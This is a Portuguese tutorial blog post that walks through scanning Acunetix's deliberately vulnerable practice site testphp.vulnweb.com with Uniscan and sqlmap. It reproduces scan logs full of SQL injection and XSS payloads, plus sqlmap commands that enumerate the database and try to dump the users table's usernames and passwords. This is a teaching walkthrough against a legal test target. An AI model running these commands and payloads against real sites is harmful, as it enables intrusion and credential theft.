Pular para o conteúdo principal

Seguidores

COMO ENCONTRAR VULNERABILIDADES EM SITES

Há muitos profissionais no mercado de trabalha que exercem a função em análises de códigos em aplicações no intuito de identificar bugs vulneráveis e reportar aos desenvolvedores, as falhas encontradas em seus programas, para que o mesmo sejam corrigidos no intuito de reforçar a segurança do sistema. 

 Com base neste tema, tive a ideia de criar este artigo para ensinar técnicas de ataques que são muito utilizadas para descoberta de vulnerabilidades em Aplicações.

As técnicas demonstrada aqui, é baseada em ataques web, onde os testes serão aplicados sobre o site Vulnweb,  a qual temos a total permissão para realizarmos este tipo de testes, pois o mesmo foi criado para este objetivo, desafiar, ensinar e motivar profissionais de segurança da informação a encontrar falhas em aplicações. 

Para a exploração, é importante ressalta que está sendo usado a Distribuição Debian "Kali Linux" e duas ferramentas super importantes que já vem pré-instaladas por padrão neste sistema operacional.vuln
  • Uniscan: Uma poderosa ferramenta de scanner de vulnerabilidade web que procura falhas comuns com por exemplo. Inclusão de arquivos locais, Execução de comandos remotos, Arquivos remotos, Sql injection, também é capaz de identificar e enumerar serviços web, arquivos e diretórios interessantes e informações do servidor.
  • SqlMap: Ferramenta open source para teste de penetração que automatiza o processo de detecção e exploração de vulnerabilidades a Injeção de SQL, este software bastante conhecido é utilizado geralmente por Crackers para invadir bancos de dados SQL.

Uniscan – Web Application Penetration Testing Tool

No terminal do Kali digite o comando "uniscan --help", vai retornar as funcionalidades de cada comando.
root@Kali2018-4:~# uniscan --help
####################################
# Uniscan project #
# http://uniscan.sourceforge.net/ #
####################################
V. 6.3
OPTIONS:
-h help
-u <url> example: https://www.example.com/
-f <file> list of url's
-b Uniscan go to background
-q Enable Directory checks
-w Enable File checks
-e Enable robots.txt and sitemap.xml check
-d Enable Dynamic checks
-s Enable Static checks
-r Enable Stress checks
-i <dork> Bing search
-o <dork> Google search
-g Web fingerprint
-j Server fingerprint
usage:
[1] perl ./uniscan.pl -u http://www.example.com/ -qweds
[2] perl ./uniscan.pl -f sites.txt -bqweds
[3] perl ./uniscan.pl -i uniscan
[4] perl ./uniscan.pl -i "ip:xxx.xxx.xxx.xxx"
[5] perl ./uniscan.pl -o "inurl:test"
[6] perl ./uniscan.pl -u https://www.example.com/ -r
Em seguida digite o comando "uniscan -u http://testphp.vulnweb.com/ -qweds" para que a ferramenta realize o checkup geral de vuln na aplicação.

root@Kali2018-4:~# uniscan -u http://testphp.vulnweb.com/ -qweds
####################################
# Uniscan project #
# http://uniscan.sourceforge.net/ #
####################################
V. 6.3
Scan date: 10-2-2020 20:45:18
===================================================================================================
| Domain: http://testphp.vulnweb.com/
| Server: nginx/1.4.1
| IP: 176.28.50.165
===================================================================================================
|
| Directory check:
| [+] CODE: 200 URL: http://testphp.vulnweb.com/Flash/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/admin/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/images/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/pictures/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/secured/
===================================================================================================
|
| File check:
| [+] CODE: 200 URL: http://testphp.vulnweb.com/CVS/Entries
| [+] CODE: 200 URL: http://testphp.vulnweb.com/favicon.ico
| [+] CODE: 200 URL: http://testphp.vulnweb.com/index.php
| [+] CODE: 200 URL: http://testphp.vulnweb.com/login.php
| [+] CODE: 200 URL: http://testphp.vulnweb.com/search.php
| [+] CODE: 200 URL: http://testphp.vulnweb.com/userinfo.php?uid=1;
===================================================================================================
|
| Check robots.txt:
|
| Check sitemap.xml:
===================================================================================================
|
| Crawler Started:
| Plugin name: E-mail Detection v.1.1 Loaded.
| Plugin name: Upload Form Detect v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: External Host Detect v.1.2 Loaded.
| Plugin name: phpinfo() Disclosure v.1 Loaded.
| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
| Plugin name: Code Disclosure v.1.1 Loaded.
| Plugin name: FCKeditor upload test v.1 Loaded.
| [+] Crawling finished, 87 URL's found!
|
| E-mails:
| [+] E-mail Found: wvs@acunetix.com
|
| File Upload Forms:
|
| Timthumb:
|
| External hosts:
| [+] External Host Found: http://www.eclectasy.com
| [+] External Host Found: http://www.acunetix.com
| [+] External Host Found: https://www.acunetix.com
| [+] External Host Found: http://blog.mindedsecurity.com
|
| PHPinfo() Disclosure:
|
| Web Backdoors:
|
| Source Code Disclosure:
| [+] Source Code Found: http://testphp.vulnweb.com/pictures/wp-config.bak
|
| FCKeditor File Upload:
|
| Ignored Files:
| http://testphp.vulnweb.com/Flash/add.fla
| http://testphp.vulnweb.com/admin/create.sql
===================================================================================================
| Dynamic tests:
| Plugin name: Learning New Directories v.1.2 Loaded.
| Plugin name: FCKedior tests v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: Find Backup Files v.1.2 Loaded.
| Plugin name: Blind SQL-injection tests v.1.3 Loaded.
| Plugin name: Local File Include tests v.1.1 Loaded.
| Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
| Plugin name: Remote Command Execution tests v.1.1 Loaded.
| Plugin name: Remote File Include tests v.1.2 Loaded.
| Plugin name: SQL-injection tests v.1.2 Loaded.
| Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
| Plugin name: Web Shell Finder v.1.3 Loaded.
| [+] 4 New directories added
|
|
| FCKeditor tests:
| Timthumb < 1.33 vulnerability:
| Backup Files:
| Blind SQL Injection:
| Local File Include:
| PHP CGI Argument Injection:
| Remote Command Execution:
| Remote File Include:
| SQL Injection:
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=1'
[*] Remaining tests: 96
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=1"
[*] Remaining tests: 95
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=2'
[*] Remaining tests: 94
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=2"
[*] Remaining tests: 93
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=3'
[*] Remaining tests: 92
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=3"
[*] Remaining tests: 91
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=4'
[*] Remaining tests: 90
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=4"
[*] Remaining tests: 89
[*] Remaining tests: 88
[*] Remaining tests: 87
[*] Remaining tests: 86
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=1'
[*] Remaining tests: 85
[*] Remaining tests: 84
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=1"
[*] Remaining tests: 83
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=2"
[*] Remaining tests: 82
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=2'
[*] Remaining tests: 81
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=3'
[*] Remaining tests: 80
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=3"
| [+] Vul [SQL-i] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123'&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| Cross-Site Scripting (XSS):
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><script>alert('XSS')</script>
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><IMG SRC="javascript:alert('XSS');">
[*] Remaining tests: 283
[*] Remaining tests: 282
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
[*] Remaining tests: 281
[*] Remaining tests: 280
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
[*] Remaining tests: 279
[*] Remaining tests: 278
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><DIV STYLE="background-image: url(javascript:alert('XSS'))">
[*] Remaining tests: 277
[*] Remaining tests: 276
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><body onload="javascript:alert('XSS')"></body>
[*] Remaining tests: 275
[*] Remaining tests: 274
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><table background="javascript:alert('XSS')"></table>
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<script>alert('XSS')</script>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 163
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<IMG SRC="javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<body onload="javascript:alert('XSS')"></body>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<table background="javascript:alert('XSS')"></table>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<script>alert('XSS')</script>&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<IMG SRC="javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 136
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 135
[*] Remaining tests: 134
[*] Remaining tests: 133
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<body onload="javascript:alert('XSS')"></body>&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 132
[*] Remaining tests: 131
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<table background="javascript:alert('XSS')"></table>&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 130
[*] Remaining tests: 129
[*] Remaining tests: 128
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<script>alert('XSS')</script>&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 127
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<IMG SRC="javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 126
[*] Remaining tests: 125
[*] Remaining tests: 124
[*] Remaining tests: 123
[*] Remaining tests: 122
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 121
[*] Remaining tests: 119
[*] Remaining tests: 119
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 118
[*] Remaining tests: 117
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 116
[*] Remaining tests: 115
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<body onload="javascript:alert('XSS')"></body>&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 114
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<table background="javascript:alert('XSS')"></table>&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 113
[*] Remaining tests: 112
[*] Remaining tests: 111
[*] Remaining tests: 110
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<script>alert('XSS')</script>&signup=123&uaddress=123
[*] Remaining tests: 109
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<IMG SRC="javascript:alert('XSS');">&signup=123&uaddress=123
[*] Remaining tests: 108
[*] Remaining tests: 107
[*] Remaining tests: 106
[*] Remaining tests: 105
[*] Remaining tests: 104
[*] Remaining tests: 103
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&signup=123&uaddress=123
[*] Remaining tests: 102
[*] Remaining tests: 101
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&signup=123&uaddress=123
[*] Remaining tests: 100
[*] Remaining tests: 99
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&signup=123&uaddress=123
[*] Remaining tests: 98
[*] Remaining tests: 97
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<body onload="javascript:alert('XSS')"></body>&signup=123&uaddress=123
[*] Remaining tests: 96
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<table background="javascript:alert('XSS')"></table>&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<script>alert('XSS')</script>
[*] Remaining tests: 73
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<IMG SRC="javascript:alert('XSS');">
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
[*] Remaining tests: 65
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<DIV STYLE="background-image: url(javascript:alert('XSS'))">
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<body onload="javascript:alert('XSS')"></body>
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<table background="javascript:alert('XSS')"></table>
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<IMG SRC="javascript:alert('XSS');">&goButton=123
[*] Remaining tests: 54
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<script>alert('XSS')</script>&goButton=123
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&goButton=123
[*] Remaining tests: 47
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&goButton=123
[*] Remaining tests: 46
[*] Remaining tests: 45
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&goButton=123
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<body onload="javascript:alert('XSS')"></body>&goButton=123
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<table background="javascript:alert('XSS')"></table>&goButton=123
| Web Shell Finder:
===================================================================================================
| Static tests:
| Plugin name: Local File Include tests v.1.1 Loaded.
| Plugin name: Remote Command Execution tests v.1.1 Loaded.
| Plugin name: Remote File Include tests v.1.1 Loaded.
|
|
| Local File Include:
| Remote Command Execution:
| Remote File Include:

===================================================================================================
Scan end date: 11-2-2020 0:59:55
HTML report saved in: report/testphp.vulnweb.com.html

sqlmap comandos

Da mesma forma que digitamos help para descobrir as funcionalidades de cada comando da ferramenta uniscan, iremos realizar com o SqlMap também. Digite o comando "sqlmap --help".

root@Kali2018-4:~# sqlmap --help
___
__H__
___ ___["]_____ ___ ___ {1.2.10#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org
Usage: python sqlmap [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK Process Google dork results as target URLs
Request:
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST
--cookie=COOKIE HTTP Cookie header value
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH SQL injection techniques to use (default "BEUSTQ")
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Miscellaneous:
--sqlmap-shell Prompt for an interactive sqlmap shell
--wizard Simple wizard interface for beginner users
[!] to see full list of options run with '-hh'

Após escanear a aplicação, caso encontrar alguma vulnerabilidades ir para o próximo passo.
Escolha um dos links vulneráveis a qual o Uniscan retornou e trabalha encima dele. No meu caso vou pegar o link "http://testphp.vulnweb.com/listproducts.php?cat=1". Lembrando que a ferramenta retornou não apenas a vulnerabilidades sqlinjection como outras vulnerabilidades também. Neste caso vamos explora as vulnerabilidades de Sql Injection identificado.
Com esta vulnerabilidades será possível coletar informações do banco de dado da aplicação e realizar manipulação de dados.

Necessitamos saber em qual banco e nome da base a qual está em execução na aplicação.
root@Kali2018-4:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.2.10#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

 [*] starting at 22:26:01

 [22:26:01] [INFO] resuming back-end DBMS 'mysql' 
[22:26:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 9252=9252

     Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: cat=1 AND (SELECT 5744 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(5744=5744,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

     Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: cat=1 AND SLEEP(5)

     Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT CONCAT(0x7162786b71,0x4b6475656744465a615a6771444655737244686a494f66776a786776626e75777879454a77486562,0x7176626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bnnk
---
[22:26:04] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0
[22:26:04] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

 [22:26:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 22:26:05

Foi possível coletar vários informações importante que não deveriam esta exposto. O MySQL é o sistema gerenciador da base de dados que está rodando nesta aplicação, também foi possível identificar duas base de dados com o seguinte nomes, acuart e information_schema.
Vamos descobrir quantos e os nomes das tabelas que estão rodando na aplicação.
Vamos trabalhar com a base de dados acuart para este testes.
root@Kali2018-4:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs -D acuart --table
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.2.10#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:00:45
[19:00:45] [INFO] resuming back-end DBMS 'mysql' 
[19:00:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 9252=9252
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: cat=1 AND (SELECT 5744 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(5744=5744,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT CONCAT(0x7162786b71,0x4b6475656744465a615a6771444655737244686a494f66776a786776626e75777879454a77486562,0x7176626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bnnk
---
[19:00:46] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0
[19:00:46] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema
[19:00:46] [INFO] fetching tables for database: 'acuart'
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
[19:00:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 19:00:46

Foi possível identificar 8 tabelas com os nomes artists, carts, categ, featured, guestbook, pictures, produts, users.

 Vamos ver as colunas da tabela users.
root@Kali2018-4:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs -D acuart -T users --columns
___
__H__
___ ___[.]_____ ___ ___ {1.2.10#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:07:36

[19:07:36] [INFO] resuming back-end DBMS 'mysql'
[19:07:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=1 AND 9252=9252

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=1 AND (SELECT 5744 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(5744=5744,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: cat=1 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: cat=1 UNION ALL SELECT CONCAT(0x7162786b71,0x4b6475656744465a615a6771444655737244686a494f66776a786776626e75777879454a77486562,0x7176626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bnnk
---
[19:07:39] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0
[19:07:39] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

[19:07:39] [INFO] fetching columns for table 'users' in database 'acuart'
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| address | mediumtext |
| cart | varchar(100) |
| cc | varchar(100) |
| email | varchar(100) |
| name | varchar(100) |
| pass | varchar(100) |
| phone | varchar(100) |
| uname | varchar(100) |
+---------+--------------+

[19:07:39] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 19:07:39

8 Colunas identificadas, com os seguintes nomes:
address, cart, cc, email, name, pass, phone, uname.
Vamos ver as informações em cadas colunas. Queremos o principal que será o usuário e senha para logar na aplicação. Pois ja sabemos que existe uma tabela usuario e que nesta tabela contém o uname e pass.
root@Kali2018-4:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs -D acuart -T users -C address,cart,cc,email,name,pass,phone,uname --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.2.10#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
